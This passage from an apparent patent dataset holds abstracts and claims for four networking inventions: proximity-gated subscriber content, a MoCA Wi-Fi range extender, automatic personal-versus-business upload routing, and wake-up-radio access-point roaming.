a server application residing on a platform server; an appliance application residing on the network-enabled viewing appliance; and a mobile device application residing on a mobile device, the method comprising the steps of: transmitting a first code from the server application to the appliance application, for display on the network-enabled viewing appliance; transmitting a second code from the mobile device application to the server application; comparing the first code to the second code on the server application; if the first code matches the second code, determining a location of each of the network-enabled viewing appliance and the mobile device via location services on each; determining whether the network-enabled viewing appliance and the mobile device are within a set distance of each other; wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within the set distance of each other, allowing for the display of subscriber content on the network-enabled viewing appliance; and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, not allowing for the display of subscriber content on the network-enabled viewing appliance. 15. The method of claim 14, wherein the first code is of the type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 16. The method of claim 14, wherein the allowing for the display of subscriber content on the network-enabled viewing appliance step comprises transmitting data relating to the subscriber content to the network-enabled viewing appliance, and storing the data on the network-enabled viewing appliance. 17. The method of claim 14, wherein the set distance is between zero and one hundred feet. 18. The method of claim 14, wherein the set distance is between zero and twenty feet. 19. The method of claim 14, further comprising the step of querying the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 20. The system of claim 19, wherein the querying step comprises querying the appliance application and the mobile device application once every five minutes. | 2,400 |
9,125 | 9,125 | 12,777,008 | 2,477 | As described herein, Multimedia over Coax Alliance (MoCA) is used to connect a range extender to a base Wireless Access Point (WAP). The MoCA based range extender may be outside the wireless range of the base WAP. In an embodiment, the MoCA based range extender may be in a wireless dead zone of the WAP. The MoCA range extender may support at least the same wireless bands as that of the base WAP. The MoCA based range extender may be automatically discovered in the network and may receive the configuration without intervention. Firmware also may be upgraded from the service provider network through the WAP. The MoCA range extender and its clients may communicate with other devices in the local network as well as other devices in the Authorized Service Domain controlled by the service provider. | 1. A method of extending a wireless network through a range extender, the method comprising:
receiving at the range extender wireless configuration information from a wireless access point through a coaxial cable; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; and receiving an indication that the detected at least one wireless device is connected to the wireless network. 2. The method of extending the wireless network of claim 1, further comprising automatically receiving updated configuration information from a remote location. 3. The method of extending the wireless network of claim 1, wherein the wireless configuration information includes an SSID and channel number. 4. The method of extending the wireless network of claim 1, further comprising transmitting configuration requests that include DHCP and ICMP requests. 5. The method of extending the wireless network of claim 1, wherein the transmitted network parameters include subnet mask and DNS name. 6. The method of extending the wireless network of claim 1, wherein the wireless configuration information includes at least one encryption key. 7. A method of extending a wireless network having a wireless access point at a location having coaxial cable, the method comprising:
receiving at the range extender wireless configuration information from the wireless access point through the coaxial cable; automatically connecting the range extender to the wireless access point via a coaxial cable network; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; and receiving an indication that the detected at least one wireless device is connected to the wireless network. 8. The method of extending the wireless network of claim 7, further comprising automatically receiving updated configuration information from a remote location. 9. The method of extending the wireless network of claim 7, wherein the wireless configuration information includes an SSID and channel number. 10. The method of extending the wireless network of claim 7, further comprising transmitting configuration requests that include DHCP and ICMP requests. 11. The method of extending the wireless network of claim 7, wherein the transmitted network parameters include subnet mask and DNS name. 12. The method of extending the wireless network of claim 7, wherein the wireless configuration information includes at least one encryption key. 13. The method of claim 1, wherein the range extender comprises a MoCA range extender. 14. A method of extending a wireless network having a wireless access point at a location having coaxial cable, the method comprising:
receiving at the range extender wireless configuration information from the wireless access point through the coaxial cable; automatically connecting the range extender to the wireless access point via a coaxial cable network; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; receiving an indication that the detected at least one wireless device is connected to the wireless network; and controlling the range extender from the wireless access point. 15. The method of extending the wireless network of claim 14, wherein the range extender and the at least one wireless device are part of an authorized service domain. 16. The method of extending the wireless network of claim 15, further comprising transmitting status of the range extender; and
based on the transmitted status, receiving updated firmware. 17. The method of claim 14, wherein the range extender comprises a MoCA range extender. 18. An apparatus comprising:
a processor; and a memory storing computer readable instructions that, when executed by said processor, cause the apparatus to perform:
receiving configuration information from the wireless access point through the coaxial cable;
automatically connecting to the wireless access point via a coaxial cable network;
detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device;
receiving an indication that the detected at least one wireless device is connected to the wireless network; and
controlling from the wireless access point. 19. The apparatus of claim 18, wherein the apparatus comprises a range extender. 20. The apparatus of claim 19 wherein the range extender comprises a MoCA range extender. | As described herein, Multimedia over Coax Alliance (MoCA) is used to connect a range extender to a base Wireless Access Point (WAP). The MoCA based range extender may be outside the wireless range of the base WAP. In an embodiment, the MoCA based range extender may be in a wireless dead zone of the WAP. The MoCA range extender may support at least the same wireless bands as that of the base WAP. The MoCA based range extender may be automatically discovered in the network and may receive the configuration without intervention. Firmware also may be upgraded from the service provider network through the WAP. The MoCA range extender and its clients may communicate with other devices in the local network as well as other devices in the Authorized Service Domain controlled by the service provider.1. A method of extending a wireless network through a range extender, the method comprising:
receiving at the range extender wireless configuration information from a wireless access point through a coaxial cable; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; and receiving an indication that the detected at least one wireless device is connected to the wireless network. 2. The method of extending the wireless network of claim 1, further comprising automatically receiving updated configuration information from a remote location. 3. The method of extending the wireless network of claim 1, wherein the wireless configuration information includes an SSID and channel number. 4. The method of extending the wireless network of claim 1, further comprising transmitting configuration requests that include DHCP and ICMP requests. 5. The method of extending the wireless network of claim 1, wherein the transmitted network parameters include subnet mask and DNS name. 6. The method of extending the wireless network of claim 1, wherein the wireless configuration information includes at least one encryption key. 7. A method of extending a wireless network having a wireless access point at a location having coaxial cable, the method comprising:
receiving at the range extender wireless configuration information from the wireless access point through the coaxial cable; automatically connecting the range extender to the wireless access point via a coaxial cable network; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; and receiving an indication that the detected at least one wireless device is connected to the wireless network. 8. The method of extending the wireless network of claim 7, further comprising automatically receiving updated configuration information from a remote location. 9. The method of extending the wireless network of claim 7, wherein the wireless configuration information includes an SSID and channel number. 10. The method of extending the wireless network of claim 7, further comprising transmitting configuration requests that include DHCP and ICMP requests. 11. The method of extending the wireless network of claim 7, wherein the transmitted network parameters include subnet mask and DNS name. 12. The method of extending the wireless network of claim 7, wherein the wireless configuration information includes at least one encryption key. 13. The method of claim 1, wherein the range extender comprises a MoCA range extender. 14. A method of extending a wireless network having a wireless access point at a location having coaxial cable, the method comprising:
receiving at the range extender wireless configuration information from the wireless access point through the coaxial cable; automatically connecting the range extender to the wireless access point via a coaxial cable network; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; receiving an indication that the detected at least one wireless device is connected to the wireless network; and controlling the range extender from the wireless access point. 15. The method of extending the wireless network of claim 14, wherein the range extender and the at least one wireless device are part of an authorized service domain. 16. The method of extending the wireless network of claim 15, further comprising transmitting status of the range extender; and
based on the transmitted status, receiving updated firmware. 17. The method of claim 14, wherein the range extender comprises a MoCA range extender. 18. An apparatus comprising:
a processor; and a memory storing computer readable instructions that, when executed by said processor, cause the apparatus to perform:
receiving configuration information from the wireless access point through the coaxial cable;
automatically connecting to the wireless access point via a coaxial cable network;
detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device;
receiving an indication that the detected at least one wireless device is connected to the wireless network; and
controlling from the wireless access point. 19. The apparatus of claim 18, wherein the apparatus comprises a range extender. 20. The apparatus of claim 19 wherein the range extender comprises a MoCA range extender. | 2,400 |
9,126 | 9,126 | 15,600,619 | 2,492 | Technologies are described herein for analyzing data to determine an upload account. In some configurations, techniques disclosed herein cause the data, and other data, to be analyzed to determine whether the data is to be uploaded to a business account associated with the user or a personal account associated with the user. A request to upload data is received from a computing device. Instead of prompting a user to manually select whether to upload the data to the personal account or the business account, the techniques determine whether the data is personal or business related. When the data is determined to be personal, the data is uploaded to the personal account. When the data is determined to be business related, the data is uploaded to the business account. | 1. A computer-implemented method comprising:
obtaining, from a computing device associated with a user, a request to store a file; obtaining contextual data from the one or more data sources that includes data associated with the user, wherein the contextual data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; analyzing at least a portion of the file to and the contextual data obtained from the one or more data sources to determine whether the file is a personal category or a business category; selecting a first account associated with the user and causing the file to be stored in the first account when it is determined that the file is the personal category; and selecting a second account associated with the user and causing the file to be stored in the second account when it is determined that the file is the business category. 2. The computer-implemented method of claim 1, wherein analyzing the at least the portion of the file and the contextual data comprises identifying from the contextual data one or more of a business contact of the user or a business activity of the user that is identified from an analysis of the file. 3. The computer-implemented method of claim 1, wherein analyzing the at least the portion of the file and the second data comprises identifying keywords from the file and determining whether the keywords are business related, and wherein selecting the second account is based at least in part on determining that the keywords are business related. 4. The computer-implemented method of claim 1, wherein the file is photographic data, and wherein analyzing the file and the contextual data includes identifying an individual depicted within photographic data and determining from the contextual data that the individual is a business contact of the user or a personal contact of the user. 5. The computer-implemented method of claim 1, wherein the first account is a personal account and the second account is a business account. 6. The computer-implemented method of claim 1, wherein selecting the account comprises utilizing a machine learning mechanism. 7. The computer-implemented method of claim 1, further comprising determining one or more individuals to recommend to share the file with based, at least in part, on contents of the file and the analysis of the contextual data. 8. A computer, comprising:
a processor; and a computer-readable storage medium in communication with the processor, the computer-readable storage medium having computer-executable instructions stored thereupon which, when executed by the processor, cause the computer to obtain, from a remote computer, a request to store first data within an account of a storage service, wherein the account is associated with a user; access second data associated with the user, wherein the second data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; analyze the first data and the second data to determine that the first data is personal or business related; select the account from at least a personal account and a business account; and cause the first data to be stored in the account. 9. The computer of claim 8, wherein analyzing the first data and the second data comprises identifying from the contact data that the first data is associated with a business contact or a personal contact of the user. 10. The computer of claim 8, wherein analyzing the first data and the second data comprises identifying one or more individuals or keywords from the first data and determining that the one or more individuals or keywords are business related, and wherein selecting the account is based at least in part on determining that the one or more individuals or keywords are business related. 11. The computer of claim 8, wherein the first data is photographic data, and wherein analyzing the first data and the second data includes identifying one or more of an individual depicted within photographic data or a location associated with the photographic data. 12. The computer of claim 8, wherein selecting the account comprises utilizing a machine learning mechanism. 13. The computer of claim 8, wherein the computer-executable instructions further cause the computer to identify one or more individuals to share the first data with based, at least in part, on contents of the first data and the second data. 14. The computer of claim 13, wherein the computer-executable instructions further cause the computer to provide for display the identification of the one or more individuals. 15. A computer-readable storage medium having computer-executable instructions stored thereupon which, when executed by a computer, cause the computer to:
obtain, from a remote computer, a request to store a file in an account of a storage service; obtain, from one or more data sources, second data associated with the user, wherein the second data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; cause a machine learning mechanism to determine that the first data is personal or business related based, at least in part, on the first data and the second data; select the account of the storage service from at least a personal account of the user and a business account of the user based at least in part on the determination that the first data is personal or business related; and cause the first data to be stored in the account. 16. The computer-readable storage medium of claim 15, wherein the computer-executable instructions further cause the computer to identify keywords from the first data. 17. The computer-readable storage medium of claim 16, wherein the keywords are provided to the machine learning mechanism. 18. The computer-readable storage medium of claim 15, wherein the computer-executable instructions further cause the computer to identify from the first data an individual and determine that the individual is a business contact or a personal contact. 19. The computer-readable storage medium of claim 15, wherein the first data is photographic data and wherein the computer-executable instructions further cause the computer to identify an individual depicted by the photographic data and determine that the individual is a contact of the user. 20. The computer-readable storage medium of claim 1, wherein the computer-executable instructions further cause the computer to identify one or more individuals to share the first data with based, at least in part, on contents of the first data and the second data. | Technologies are described herein for analyzing data to determine an upload account. In some configurations, techniques disclosed herein cause the data, and other data, to be analyzed to determine whether the data is to be uploaded to a business account associated with the user or a personal account associated with the user. A request to upload data is received from a computing device. Instead of prompting a user to manually select whether to upload the data to the personal account or the business account, the techniques determine whether the data is personal or business related. When the data is determined to be personal, the data is uploaded to the personal account. When the data is determined to be business related, the data is uploaded to the business account.1. A computer-implemented method comprising:
obtaining, from a computing device associated with a user, a request to store a file; obtaining contextual data from the one or more data sources that includes data associated with the user, wherein the contextual data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; analyzing at least a portion of the file to and the contextual data obtained from the one or more data sources to determine whether the file is a personal category or a business category; selecting a first account associated with the user and causing the file to be stored in the first account when it is determined that the file is the personal category; and selecting a second account associated with the user and causing the file to be stored in the second account when it is determined that the file is the business category. 2. The computer-implemented method of claim 1, wherein analyzing the at least the portion of the file and the contextual data comprises identifying from the contextual data one or more of a business contact of the user or a business activity of the user that is identified from an analysis of the file. 3. The computer-implemented method of claim 1, wherein analyzing the at least the portion of the file and the second data comprises identifying keywords from the file and determining whether the keywords are business related, and wherein selecting the second account is based at least in part on determining that the keywords are business related. 4. The computer-implemented method of claim 1, wherein the file is photographic data, and wherein analyzing the file and the contextual data includes identifying an individual depicted within photographic data and determining from the contextual data that the individual is a business contact of the user or a personal contact of the user. 5. The computer-implemented method of claim 1, wherein the first account is a personal account and the second account is a business account. 6. The computer-implemented method of claim 1, wherein selecting the account comprises utilizing a machine learning mechanism. 7. The computer-implemented method of claim 1, further comprising determining one or more individuals to recommend to share the file with based, at least in part, on contents of the file and the analysis of the contextual data. 8. A computer, comprising:
a processor; and a computer-readable storage medium in communication with the processor, the computer-readable storage medium having computer-executable instructions stored thereupon which, when executed by the processor, cause the computer to obtain, from a remote computer, a request to store first data within an account of a storage service, wherein the account is associated with a user; access second data associated with the user, wherein the second data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; analyze the first data and the second data to determine that the first data is personal or business related; select the account from at least a personal account and a business account; and cause the first data to be stored in the account. 9. The computer of claim 8, wherein analyzing the first data and the second data comprises identifying from the contact data that the first data is associated with a business contact or a personal contact of the user. 10. The computer of claim 8, wherein analyzing the first data and the second data comprises identifying one or more individuals or keywords from the first data and determining that the one or more individuals or keywords are business related, and wherein selecting the account is based at least in part on determining that the one or more individuals or keywords are business related. 11. The computer of claim 8, wherein the first data is photographic data, and wherein analyzing the first data and the second data includes identifying one or more of an individual depicted within photographic data or a location associated with the photographic data. 12. The computer of claim 8, wherein selecting the account comprises utilizing a machine learning mechanism. 13. The computer of claim 8, wherein the computer-executable instructions further cause the computer to identify one or more individuals to share the first data with based, at least in part, on contents of the first data and the second data. 14. The computer of claim 13, wherein the computer-executable instructions further cause the computer to provide for display the identification of the one or more individuals. 15. A computer-readable storage medium having computer-executable instructions stored thereupon which, when executed by a computer, cause the computer to:
obtain, from a remote computer, a request to store a file in an account of a storage service; obtain, from one or more data sources, second data associated with the user, wherein the second data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; cause a machine learning mechanism to determine that the first data is personal or business related based, at least in part, on the first data and the second data; select the account of the storage service from at least a personal account of the user and a business account of the user based at least in part on the determination that the first data is personal or business related; and cause the first data to be stored in the account. 16. The computer-readable storage medium of claim 15, wherein the computer-executable instructions further cause the computer to identify keywords from the first data. 17. The computer-readable storage medium of claim 16, wherein the keywords are provided to the machine learning mechanism. 18. The computer-readable storage medium of claim 15, wherein the computer-executable instructions further cause the computer to identify from the first data an individual and determine that the individual is a business contact or a personal contact. 19. The computer-readable storage medium of claim 15, wherein the first data is photographic data and wherein the computer-executable instructions further cause the computer to identify an individual depicted by the photographic data and determine that the individual is a contact of the user. 20. The computer-readable storage medium of claim 1, wherein the computer-executable instructions further cause the computer to identify one or more individuals to share the first data with based, at least in part, on contents of the first data and the second data. | 2,400 |
9,127 | 9,127 | 15,391,332 | 2,416 | A wireless communication device, a system, and a method. The device may use memory circuitry and processing circuitry to process a packet wirelessly transmitted to the STA from a serving AP. The packet may be configured according to a first wireless communication protocol from a serving AP, such as, for example, WLAN. The wireless communication device may further process a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol. The second wireless communication protocol may be the LP-WU radio communication protocol. The device may determine a received signal strength indicator (RSSI) value of the low modulation packet, and may further process a frame including information on an address or signature, such as a Service Set Identifier (SSID) for the serving AP corresponding to the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device. The device may then associate the RSSI value with the address of the candidate access point, and trigger transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. | 1. A wireless communication device including a memory and processing circuitry coupled to the memory and including logic to:
process a packet configured according to a first wireless communication protocol from a serving access point, process a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; process a frame including information on an address of the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device; associate an RSSI value of the low modulation packet with the address of the candidate access point; trigger transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. 2. The device of claim 1, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, the modulation rate of the low modulation packet being an On-Off Keying (OOK) modulation rate; and the first wireless communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 3. The device of claim 1, wherein:
the candidate access point includes a plurality of candidate access points; the address of a candidate access point includes a plurality of addresses for respective ones of the candidate access points; the low modulation packet includes a plurality of low modulation packets, each of the low modulation packets further being from a corresponding one of the candidate access points and further being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; the RSSI value includes a plurality of RSSI values for each of the low modulation packets; and the logic is to trigger transition of the device from the serving access point to one of the plurality of candidate access points based on the RSSI values and the corresponding addresses of the candidate access points. 4. The device of claim 1, wherein the frame is a neighbor report frame from the serving access point configured according to the first wireless communication protocol, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate the RSSI value with the address of the candidate access point, the information on the timing for the transmission of the low modulation packet including at least one of a target transmission time of the low modulation packet and an interval at which the low modulation packet is to be transmitted. 5. The device of claim 1, wherein the frame includes the low modulation packet and is from the candidate access point, and wherein the low modulation packet includes the information on the address of the candidate access point. 6. The device of claim 1, wherein the frame is from the serving access point, the device further including logic to:
determine an RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point; trigger transition of the device from the serving access point to the candidate access point based on a comparison of the RSSI value of the low modulation packet with the RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point. 7. The device of claim 1, wherein the logic is further to compare the RSSI value of the low modulation packet from the candidate access point with an RSSI value associated with the serving access point or with other candidate access points, and to trigger transition to one of the candidate access points associated with a highest RSSI value, or to one of the candidate access points with an RSSI value above a predetermined RSSI threshold value. 8. The device of claim 1, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; a second baseband processor connected to the second radio and second front-end module; one or more antennas connected to the first front-end module and the second front end module to communicate signals configured according to the first wireless communication protocol and the second wireless communication protocol. 9. The device of claim 1, wherein the packet configured according to the first wireless communication protocol from the serving access point and the low modulation packet configured according to the second wireless communication protocol from the candidate access point both have a legacy PHY preamble according to the first wireless communication protocol. 10. A product comprising one or more tangible computer-readable non-transitory storage media comprising computer-executable instructions operable to, when executed by at least one computer processor, enable the at least one computer processor to implement operations at a wireless communication device, the operations comprising:
processing a packet configured according to a first wireless communication protocol from a serving access point, processing a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; determining a received signal strength indicator (RSSI) value of the low modulation packet; processing a frame including information on an address of the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device; associating the RSSI value with the address of the candidate access point; triggering transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. 11. The product of claim 10, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, and the modulation rate of the low modulation packet is an On-Off Keying (OOK) modulation rate; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineering (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 12. The product of claim 10, wherein the frame is a neighbor report frame from the serving access point, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate the RSSI value with the address of the candidate access point. 13. The product of claim 10, wherein the frame includes the low modulation packet and is from the candidate access point, and wherein the low modulation packet includes the information on the address of the candidate access point. 14. The product of claim 10, wherein the frame is from the serving access point, the device further including logic to:
determine an RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point; trigger transition of the device from the serving access point to the candidate access point based on a comparison of the RSSI value of the low modulation packet with the RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point. 15. The product of claim 10, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; a second baseband processor connected to the second radio and second front-end module; and one or more antennas connected to the first and second front-end modules. 16. The product of claim 10, wherein the packet configured according to the first wireless communication protocol from the serving access point and the low modulation packet configured according to the second wireless communication protocol from the candidate access point both have a legacy PHY preamble according to the first wireless communication protocol. 17. A wireless communication device including:
a memory; processing circuitry coupled to the memory and including logic to:
process a packet configured according to a first wireless communication protocol from a wireless station;
cause transmission to the wireless station of a low modulation packet configured according to a second wireless communication protocol, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol;
wherein the packet configured according to the first wireless communication protocol and the low modulation packet configured according to the second wireless communication protocol both have a legacy PHY preamble according to the first wireless communication protocol. 18. The device of claim 17, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 19. The device of claim 17, wherein the logic is further to cause transmission of a neighbor report frame configured according to the first wireless communication protocol or to another wireless communication protocol and including information on a timing for a transmission of the low modulation packet, the information on the timing for the transmission of the low modulation packet including at least one of a target transmission time of the low modulation packet and an interval at which the low modulation packet is to be transmitted. 20. The device of claim 17, wherein the wireless communication device is to be used as part of an access point, and wherein the low modulation packet includes information on an address of the access point. 21. The device of claim 17, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; and a second baseband processor connected to the second radio and second front-end module. 22. A product comprising one or more tangible computer-readable non-transitory storage media comprising computer-executable instructions operable to, when executed by at least one computer processor, enable the at least one computer processor to implement operations at a wireless communication device, the operations comprising:
processing a packet configured according to a first wireless communication protocol from a wireless station; causing transmission to the wireless station of a low modulation packet configured according to a second wireless communication protocol, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; wherein the packet configured according to the first wireless communication protocol and the low modulation packet configured according to the second wireless communication protocol both have a legacy PHY preamble according to the first wireless communication protocol. 23. The product of claim 22, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, and the modulation rate of the low modulation packet is an On-Off Keying (OOK) modulation rate; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 24. The product of claim 22, wherein the wireless communication device is to be used as part of an access point, and wherein the low modulation packet includes information on an address of the access point. 25. The product of claim 22, wherein the packet configured according to the first wireless communication protocol is a neighbor report frame from the serving access point, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate an RSSI value with the address of the candidate access point. | A wireless communication device, a system, and a method. The device may use memory circuitry and processing circuitry to process a packet wirelessly transmitted to the STA from a serving AP. The packet may be configured according to a first wireless communication protocol from a serving AP, such as, for example, WLAN. The wireless communication device may further process a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol. The second wireless communication protocol may be the LP-WU radio communication protocol. The device may determine a received signal strength indicator (RSSI) value of the low modulation packet, and may further process a frame including information on an address or signature, such as a Service Set Identifier (SSID) for the serving AP corresponding to the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device. The device may then associate the RSSI value with the address of the candidate access point, and trigger transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point.1. A wireless communication device including a memory and processing circuitry coupled to the memory and including logic to:
process a packet configured according to a first wireless communication protocol from a serving access point, process a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; process a frame including information on an address of the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device; associate an RSSI value of the low modulation packet with the address of the candidate access point; trigger transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. 2. The device of claim 1, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, the modulation rate of the low modulation packet being an On-Off Keying (OOK) modulation rate; and the first wireless communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 3. The device of claim 1, wherein:
the candidate access point includes a plurality of candidate access points; the address of a candidate access point includes a plurality of addresses for respective ones of the candidate access points; the low modulation packet includes a plurality of low modulation packets, each of the low modulation packets further being from a corresponding one of the candidate access points and further being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; the RSSI value includes a plurality of RSSI values for each of the low modulation packets; and the logic is to trigger transition of the device from the serving access point to one of the plurality of candidate access points based on the RSSI values and the corresponding addresses of the candidate access points. 4. The device of claim 1, wherein the frame is a neighbor report frame from the serving access point configured according to the first wireless communication protocol, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate the RSSI value with the address of the candidate access point, the information on the timing for the transmission of the low modulation packet including at least one of a target transmission time of the low modulation packet and an interval at which the low modulation packet is to be transmitted. 5. The device of claim 1, wherein the frame includes the low modulation packet and is from the candidate access point, and wherein the low modulation packet includes the information on the address of the candidate access point. 6. The device of claim 1, wherein the frame is from the serving access point, the device further including logic to:
determine an RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point; trigger transition of the device from the serving access point to the candidate access point based on a comparison of the RSSI value of the low modulation packet with the RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point. 7. The device of claim 1, wherein the logic is further to compare the RSSI value of the low modulation packet from the candidate access point with an RSSI value associated with the serving access point or with other candidate access points, and to trigger transition to one of the candidate access points associated with a highest RSSI value, or to one of the candidate access points with an RSSI value above a predetermined RSSI threshold value. 8. The device of claim 1, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; a second baseband processor connected to the second radio and second front-end module; one or more antennas connected to the first front-end module and the second front end module to communicate signals configured according to the first wireless communication protocol and the second wireless communication protocol. 9. The device of claim 1, wherein the packet configured according to the first wireless communication protocol from the serving access point and the low modulation packet configured according to the second wireless communication protocol from the candidate access point both have a legacy PHY preamble according to the first wireless communication protocol. 10. A product comprising one or more tangible computer-readable non-transitory storage media comprising computer-executable instructions operable to, when executed by at least one computer processor, enable the at least one computer processor to implement operations at a wireless communication device, the operations comprising:
processing a packet configured according to a first wireless communication protocol from a serving access point, processing a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; determining a received signal strength indicator (RSSI) value of the low modulation packet; processing a frame including information on an address of the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device; associating the RSSI value with the address of the candidate access point; triggering transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. 11. The product of claim 10, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, and the modulation rate of the low modulation packet is an On-Off Keying (OOK) modulation rate; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineering (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 12. The product of claim 10, wherein the frame is a neighbor report frame from the serving access point, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate the RSSI value with the address of the candidate access point. 13. The product of claim 10, wherein the frame includes the low modulation packet and is from the candidate access point, and wherein the low modulation packet includes the information on the address of the candidate access point. 14. The product of claim 10, wherein the frame is from the serving access point, the device further including logic to:
determine an RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point; trigger transition of the device from the serving access point to the candidate access point based on a comparison of the RSSI value of the low modulation packet with the RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point. 15. The product of claim 10, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; a second baseband processor connected to the second radio and second front-end module; and one or more antennas connected to the first and second front-end modules. 16. The product of claim 10, wherein the packet configured according to the first wireless communication protocol from the serving access point and the low modulation packet configured according to the second wireless communication protocol from the candidate access point both have a legacy PHY preamble according to the first wireless communication protocol. 17. A wireless communication device including:
a memory; processing circuitry coupled to the memory and including logic to:
process a packet configured according to a first wireless communication protocol from a wireless station;
cause transmission to the wireless station of a low modulation packet configured according to a second wireless communication protocol, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol;
